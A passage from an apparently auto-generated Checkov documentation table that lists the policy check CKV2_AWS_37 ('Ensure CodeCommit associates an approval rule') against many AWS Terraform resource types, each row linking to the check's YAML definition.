[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1192 | CKV2_AWS_37 | resource | aws_iot_topic_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1193 | CKV2_AWS_37 | resource | aws_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1194 | CKV2_AWS_37 | resource | aws_kinesis_analytics_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1195 | CKV2_AWS_37 | resource | aws_kinesis_firehose_delivery_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1196 | CKV2_AWS_37 | resource | aws_kinesis_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1197 | CKV2_AWS_37 | resource | aws_kinesis_video_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1198 | CKV2_AWS_37 | resource | aws_kms_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1199 | CKV2_AWS_37 | resource | aws_kms_ciphertext | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1200 | CKV2_AWS_37 | resource | aws_kms_external_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1201 | CKV2_AWS_37 | resource | aws_kms_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1202 | CKV2_AWS_37 | resource | aws_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1203 | CKV2_AWS_37 | resource | aws_lambda_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1204 | CKV2_AWS_37 | resource | aws_lambda_event_source_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1205 | CKV2_AWS_37 | resource | aws_lambda_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1206 | CKV2_AWS_37 | resource | aws_lambda_function_event_invoke_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1207 | CKV2_AWS_37 | resource | aws_lambda_layer_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1208 | CKV2_AWS_37 | resource | aws_lambda_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1209 | CKV2_AWS_37 | resource | aws_lambda_provisioned_concurrency_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1210 | CKV2_AWS_37 | resource | aws_launch_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1211 | CKV2_AWS_37 | resource | aws_launch_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1212 | CKV2_AWS_37 | resource | aws_lb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1213 | CKV2_AWS_37 | resource | aws_lb_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1214 | CKV2_AWS_37 | resource | aws_lb_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1215 | CKV2_AWS_37 | resource | aws_lb_listener_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1216 | CKV2_AWS_37 | resource | aws_lb_listener_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1217 | CKV2_AWS_37 | resource | aws_lb_ssl_negotiation_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1218 | CKV2_AWS_37 | resource | aws_lb_target_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1219 | CKV2_AWS_37 | resource | aws_lb_target_group_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1220 | CKV2_AWS_37 | resource | aws_licensemanager_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1221 | CKV2_AWS_37 | resource | aws_licensemanager_license_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1222 | CKV2_AWS_37 | resource | aws_lightsail_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1223 | CKV2_AWS_37 | resource | aws_lightsail_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1224 | CKV2_AWS_37 | resource | aws_lightsail_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1225 | CKV2_AWS_37 | resource | aws_lightsail_static_ip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1226 | CKV2_AWS_37 | resource | aws_lightsail_static_ip_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1227 | CKV2_AWS_37 | resource | aws_load_balancer_backend_server_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1228 | CKV2_AWS_37 | resource | aws_load_balancer_listener_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1229 | CKV2_AWS_37 | resource | aws_load_balancer_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1230 | CKV2_AWS_37 | resource | aws_macie_member_account_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1231 | CKV2_AWS_37 | resource | aws_macie_s3_bucket_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1232 | CKV2_AWS_37 | resource | aws_main_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1233 | CKV2_AWS_37 | resource | aws_media_convert_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1234 | CKV2_AWS_37 | resource | aws_media_package_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1235 | CKV2_AWS_37 | resource | aws_media_store_container | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1236 | CKV2_AWS_37 | resource | aws_media_store_container_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1237 | CKV2_AWS_37 | resource | aws_mq_broker | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1238 | CKV2_AWS_37 | resource | aws_mq_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1239 | CKV2_AWS_37 | resource | aws_msk_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1240 | CKV2_AWS_37 | resource | aws_msk_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1241 | CKV2_AWS_37 | resource | aws_nat_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1242 | CKV2_AWS_37 | resource | aws_neptune_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1243 | CKV2_AWS_37 | resource | aws_neptune_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1244 | CKV2_AWS_37 | resource | aws_neptune_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1245 | CKV2_AWS_37 | resource | aws_neptune_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1246 | CKV2_AWS_37 | resource | aws_neptune_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1247 | CKV2_AWS_37 | resource | aws_neptune_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1248 | CKV2_AWS_37 | resource | aws_neptune_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1249 | CKV2_AWS_37 | resource | aws_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1250 | CKV2_AWS_37 | resource | aws_network_acl_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1251 | CKV2_AWS_37 | resource | aws_network_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1252 | CKV2_AWS_37 | resource | aws_network_interface_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1253 | CKV2_AWS_37 | resource | aws_network_interface_sg_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1254 | CKV2_AWS_37 | resource | aws_opsworks_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1255 | CKV2_AWS_37 | resource | aws_opsworks_custom_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1256 | CKV2_AWS_37 | resource | aws_opsworks_ganglia_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1257 | CKV2_AWS_37 | resource | aws_opsworks_haproxy_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1258 | CKV2_AWS_37 | resource | aws_opsworks_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1259 | CKV2_AWS_37 | resource | aws_opsworks_java_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1260 | CKV2_AWS_37 | resource | aws_opsworks_memcached_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1261 | CKV2_AWS_37 | resource | aws_opsworks_mysql_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1262 | CKV2_AWS_37 | resource | aws_opsworks_nodejs_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1263 | CKV2_AWS_37 | resource | aws_opsworks_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1264 | CKV2_AWS_37 | resource | aws_opsworks_php_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1265 | CKV2_AWS_37 | resource | aws_opsworks_rails_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1266 | CKV2_AWS_37 | resource | aws_opsworks_rds_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1267 | CKV2_AWS_37 | resource | aws_opsworks_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1268 | CKV2_AWS_37 | resource | aws_opsworks_static_web_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1269 | CKV2_AWS_37 | resource | aws_opsworks_user_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1270 | CKV2_AWS_37 | resource | aws_organizations_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1271 | CKV2_AWS_37 | resource | aws_organizations_organization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1272 | CKV2_AWS_37 | resource | aws_organizations_organizational_unit | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1273 | CKV2_AWS_37 | resource | aws_organizations_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1274 | CKV2_AWS_37 | resource | aws_organizations_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1275 | CKV2_AWS_37 | resource | aws_pinpoint_adm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1276 | CKV2_AWS_37 | resource | aws_pinpoint_apns_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1277 | CKV2_AWS_37 | resource | aws_pinpoint_apns_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1278 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1279 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1280 | CKV2_AWS_37 | resource | aws_pinpoint_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1281 | CKV2_AWS_37 | resource | aws_pinpoint_baidu_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1282 | CKV2_AWS_37 | resource | aws_pinpoint_email_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1283 | CKV2_AWS_37 | resource | aws_pinpoint_event_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1284 | CKV2_AWS_37 | resource | aws_pinpoint_gcm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1285 | CKV2_AWS_37 | resource | aws_pinpoint_sms_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1286 | CKV2_AWS_37 | resource | aws_placement_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1287 | CKV2_AWS_37 | resource | aws_proxy_protocol_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1288 | CKV2_AWS_37 | resource | aws_qldb_ledger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1289 | CKV2_AWS_37 | resource | aws_quicksight_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1290 | CKV2_AWS_37 | resource | aws_quicksight_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1291 | CKV2_AWS_37 | resource | aws_ram_principal_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1292 | CKV2_AWS_37 | resource | aws_ram_resource_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1293 | CKV2_AWS_37 | resource | aws_ram_resource_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1294 | CKV2_AWS_37 | resource | aws_ram_resource_share_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1295 | CKV2_AWS_37 | resource | aws_rds_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1296 | CKV2_AWS_37 | resource | aws_rds_cluster_endpoint | Ensure CodeCommit associates an approval rule | Terraform | 